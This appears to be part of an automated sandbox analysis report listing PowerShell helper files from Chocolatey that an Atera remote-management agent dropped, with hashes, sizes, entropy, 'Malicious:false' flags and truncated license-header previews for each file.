                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKovnYWHVjmlvr79s5nFUFwlmiZn28HeheXeGYDXSqVR2vRtktvS:cSyL+QGXH2QVqlvr7y5nFDXnw0ud3Q
                                                                                                                                                                                                                                                                                              MD5:510D813D8B844FA9ABCF1CF8B294CE83
                                                                                                                                                                                                                                                                                              SHA1:B733C7BC5B1EA00C27895DE8BFB337183D9335E1
                                                                                                                                                                                                                                                                                              SHA-256:58C4E3DE6F018A33E4952AF35EFCCC0B688F1170F733CC10E2C32A33F11A9123
                                                                                                                                                                                                                                                                                              SHA-512:3D3DA339A6B9CAC75CB940B573703BBA5782D22918637D4399636F0F2787436920D6965F2165E294C68107905D556F115CD8416C97A18B12B7F0207CD7721AAC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-WebHeaders {..<#...SYNOPSIS..Gets the request/response headers for a url......DESCRIPTION..This is a low-level function that is used by Chocolatey to get the..headers for a reque

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-BinFile.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6283
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.232086061865062
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXHN0Vk7arlCnBVV+7oc9KYjWndTmw:ctL+QG05rlwguh
                                                                                                                                                                                                                                                                                              MD5:5617A2B6826D73A80E864B42A3404E72
                                                                                                                                                                                                                                                                                              SHA1:61522560BF997DD79C6649F0C1D198510E19430F
                                                                                                                                                                                                                                                                                              SHA-256:9FC392C4558C2579517F24D945D8E1741EB4A5D7893E4E2DCA6CA756443AB328
                                                                                                                                                                                                                                                                                              SHA-512:B4EA54386B427AC314854AE3584EBF7AEB9E178026346917B05249A28CF831FBD7F87D12CCF56F00DA9C4F55ABC7324E69C4AB9B367258AC2F35960BAFEFADF3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-BinFile {..<#...SYNOPSIS..Creates a shim (or batch redirect) for a file that is on the PATH......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\b

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4293
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.147557599553147
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKooCb/InyxVkR8PIoIxAETBXSYG:cSyL+QGXHeCjIGVo8qXSYG
                                                                                                                                                                                                                                                                                              MD5:06FC3CDC03EC16E85CE73D558D58742B
                                                                                                                                                                                                                                                                                              SHA1:C73F95322D853B964AD241CD9B1EFD1A6AF8B101
                                                                                                                                                                                                                                                                                              SHA-256:E6E24F83FDA53709F7EA93F73533314156F1DA0B028FC7BD063BA1720D1A6ADA
                                                                                                                                                                                                                                                                                              SHA-512:A1BB72C33CC1544432B6E4A3317843331ECB70D954DBFC195A3A6AD3FDF18280F807BF2A9DEC06D036111A46062EE04A87C2D315F4E895D2C7F2DAAF6B4CB48A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Creates a persistent environment variable......DES

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4549
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.216765809932499
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKobx0W2Pq44GGVq/r6ck8Tr6ck012gMe5RDJRmR0GRSd:cSyL+QGXHBx03x4rVqDQ8vQubL5HItUd
                                                                                                                                                                                                                                                                                              MD5:D283FDF0627E77F4745CE26CBB134DDB
                                                                                                                                                                                                                                                                                              SHA1:D41419D3F8DC3F22B37E5CDE1090CF19879F8466
                                                                                                                                                                                                                                                                                              SHA-256:C4292F8767BD7E74E85C4AABCDB9EB0ED3B564693AAC1F568EB02FF7529DF027
                                                                                                                                                                                                                                                                                              SHA-512:A14822AEC4351C106325F1403F79DF444CB53C03CB09AE0FF15169CEC821102A11186B321F9FE8CEFC35932FE02A874E984EECADDA3EC5DCA52AB7EDEE9DB1F4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyExplorerMenuItem {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates a windows explorer context menu item that can be associated with..a command.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyFileAssociation.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3080
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.192518177403395
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKoognbqHdyVO6ckUf1eg9DgH:cSyL+QGXHqgnydyVOQUf1eg9DgH
                                                                                                                                                                                                                                                                                              MD5:44D634D52E391B61FEA2B3311FD130C4
                                                                                                                                                                                                                                                                                              SHA1:AC5184FA6552AD3D2D58EBD53563ED3238E089FF
                                                                                                                                                                                                                                                                                              SHA-256:22FA3870EC2455426BD2BA94B5DC82C241D16F1DBD1AC6979787E947B39563AE
                                                                                                                                                                                                                                                                                              SHA-512:53F5C0D5865DA75816B663CDD4279938401498416A2AD4FD4A7667CC93042D4FBCBC7B2F2F1FD3864CFADBC73908730C6EC7761A77207511861CB277AF8DBF59
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyFileAssociation {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates an association between a file extension and a executable......DESCRIPTION..In

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyInstallPackage.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14313
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.166123502608628
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ctL+QGm9UIirNuMyrnyBOXOrH2ZoBZiLtM+h1yBPSa:ctL+yG9PKQaOyaBEl1+PSa
                                                                                                                                                                                                                                                                                              MD5:7BB19403672F88442C8510579DEEA62B
                                                                                                                                                                                                                                                                                              SHA1:D7685A3C16C53822D696EE3479451BCF1C42860A
                                                                                                                                                                                                                                                                                              SHA-256:FDAE94594F6DDF60874760BC0E8306422681CE7C177BFA811A625AE74363CCAF
                                                                                                                                                                                                                                                                                              SHA-512:8383D42946F02B72676BF3F6016C0CFA9355AE840320354111B8E40CD9567F46B558B4B60809BF6F0B1364A1F84E6815DC04B02D2F42078E0057F1990CCC83A3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyInstallPackage {.. <#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features". Use..Install-ChocolateyPackage when

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPackage.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17164
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.102467977763193
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ctL+QG/i9AUaHrN+eNbVPoC8XdI96LMw9lpWo:ctL+jiKUW+eNbVPHMG9Gz
                                                                                                                                                                                                                                                                                              MD5:EF3DA9AA21D97701F975F6E7EC05790D
                                                                                                                                                                                                                                                                                              SHA1:C78F165791049FA3A17218AE2ADEECF79C628E15
                                                                                                                                                                                                                                                                                              SHA-256:917FCEC8CA28B0EF404F565AAECF7FB850E193326D012583927CAA8BB55FB3EC
                                                                                                                                                                                                                                                                                              SHA-512:40C18493196A1395EB72629042E0BE98F19CF657E402FF0F21447A238879157534BBCA632C40B047B42C4EA46C9935D40EF53604DCADB5552B8F6D4A5027C809
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPackage {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features" based on a remote file..download. Use Install-

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPath.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4341
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.172978110813656
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoMb4lFkF9lr4cr8QCz7rVgAY+AExSNzwdOq7FuRFu7lVENiz:cSyL+4pGXHFKoETMcePrVnxAExSsl73
                                                                                                                                                                                                                                                                                              MD5:B8FD2F73466C4538F16B753C1707E185
                                                                                                                                                                                                                                                                                              SHA1:DEEAFE9F90676AC71FDC879D856A5FF312AF0D74
                                                                                                                                                                                                                                                                                              SHA-256:1134D81094235B52249BD974129142BCE3B9796387C0D7CE71CE68A909A5C6B6
                                                                                                                                                                                                                                                                                              SHA-512:BE6FCFB5FCBA314D4CE62FB47B3A292AADD6C7FB6723D042FC603211B7DFC20D8E2213132BA0ECF29A00050A0C7640E00FF6638EA499A2C0A33D8FBCFBC004E5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPath {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-PathType 'Machine'.`....This puts a directory to the PATH environment variable......DESCRIPTI

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2645
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.278706654776255
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:cSyL+4pe90AlH31KoMD+4RXPXbVSPDqA9FM4jImbO2Poq+:cSyL+4pGXHFKoi7bVSe+M4jImg
                                                                                                                                                                                                                                                                                              MD5:9432BDECB1FAE8A80B302A6216A7615B
                                                                                                                                                                                                                                                                                              SHA1:80C6C8255413A9B9E2BD8DE14B274DFEF1F6E86A
                                                                                                                                                                                                                                                                                              SHA-256:20510B09D631C0E5D9E6E4E5F0FC47EF47C1A413FE3F83A2413A2F4E42E1B649
                                                                                                                                                                                                                                                                                              SHA-512:F6BF39157FB67D7434CCC6F80CF7E13C04302243BE3589D8FF85ECDEA1A19559091BA86FD7BB22671B239F16136ABC8FA84A156477497B32B35E9721EF9B7103
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPinnedTaskBarItem {..<#...SYNOPSIS..Creates an item in the task bar linking to the provided path......NOTES..Does not work with SYSTEM, but does not error. It warns

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyPowershellCommand.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9319
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.106965440646972
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXHni8ybOOeHYlqWKWXVWpRXrHoyf4yc0q1:ctL+QG3ij9e4lqZfc1
                                                                                                                                                                                                                                                                                              MD5:D95A27860316FF9415C6E59530A4F83E
                                                                                                                                                                                                                                                                                              SHA1:16CA9BB81AC55A4EE814915F919FCE89634D637D
                                                                                                                                                                                                                                                                                              SHA-256:F6A1CEB186C30AAD003EAE9B71FDEF4D1DC0D989C81FFDD844C5E9B82EF9532D
                                                                                                                                                                                                                                                                                              SHA-512:4FBE61563130EF06FC69C5FEEFAD59A6FB4DF01BCA7C289A9E8E7B3D16B06BE8BB652AAC7DBF5548BCDDB7F9EEFC2E739B707694BF18995C645F4715DD43C1D3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPowershellCommand {..<#...SYNOPSIS..Installs a PowerShell Script as a command.....DESCRIPTION..This will install a PowerShell script as a command on your system. Li

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyShortcut.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7888
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.219559860002251
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXH9mufXMVW7Vb944B6/yS/LIiP8/HahiJqhx8l91b:ctL+QGtmufXBVbwBPi6cJ4x8l91b
                                                                                                                                                                                                                                                                                              MD5:B67CDEF057B2B5376CFDBE1F51AC241E
                                                                                                                                                                                                                                                                                              SHA1:12B3484E2F85D5C591F1DDD178BA71F224BC232B
                                                                                                                                                                                                                                                                                              SHA-256:D09B2B6B3D43259E79E6778581BA884B526D7A0687C90B19F38EF5B0CA1E5752
                                                                                                                                                                                                                                                                                              SHA-512:BDBEC684B46B3039C7C369901C618E4D0313588B4AB3AE3A10C20CA89C9F2CFB24430FF360FA63D813B920088C7CE5DE17C20C193E0F5FBE40495A86212760FA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyShortcut {..<#...SYNOPSIS..Creates a shortcut.....DESCRIPTION..This adds a shortcut, at the specified location, with the option to specify..a number of additional p

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyVsixPackage.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8855
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1654657712280985
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXHrDorybOY2W/thNuVwBE6nBEvEGYfpxIDcO:ctL+QGNk67zyYpG7
                                                                                                                                                                                                                                                                                              MD5:B751C9113B9601DC1B66D597F86474E9
                                                                                                                                                                                                                                                                                              SHA1:E69E72AEAC3BBF5E3DE0C307FE62C0D293FCE36E
                                                                                                                                                                                                                                                                                              SHA-256:E821C31B1A2C9CF7BB6AF12BBB70D88DC30ABADCBD68197982A0DCC6EEF7C982
                                                                                                                                                                                                                                                                                              SHA-512:BCA21C385EA43B62CF113D35E3A50A66E69C6CB98BDE874DC38D6B517206456C4B3726825EA962E0F1676FD8ED936C51DD8FE7D85E9C1F3A336FDC961A53A662
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyVsixPackage {..<#...SYNOPSIS..Downloads and installs a VSIX package for Visual Studio.....DESCRIPTION..VSIX packages are Extensions for the Visual Studio IDE. The V

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Install-ChocolateyZipPackage.ps1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9740
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.124129906660506
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXH5l6ybO41LHHPWUWYhNfhNuVtsYzrPr:ctL+QGJlhXlHvbVPLYzLr
                                                                                                                                                                                                                                                                                              MD5:A9F2320F7C75DB38BA32DE454DB14F41
                                                                                                                                                                                                                                                                                              SHA1:52869D1B9C412DC5AB848E1E363A2F1C043A6EBA
                                                                                                                                                                                                                                                                                              SHA-256:D5C38F705555D2F334308EB27E8CFADA3E1503390A19D99C26810295047815E7
                                                                                                                                                                                                                                                                                              SHA-512:D40A8228A93F7543D1F447BC2989A5A9714F07F6CDE411801659483A0BCE5BD5696B5631DEC89FE6D4C9DDD87F29002A421627C9CF60EC57A6A93E02F028BE85
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
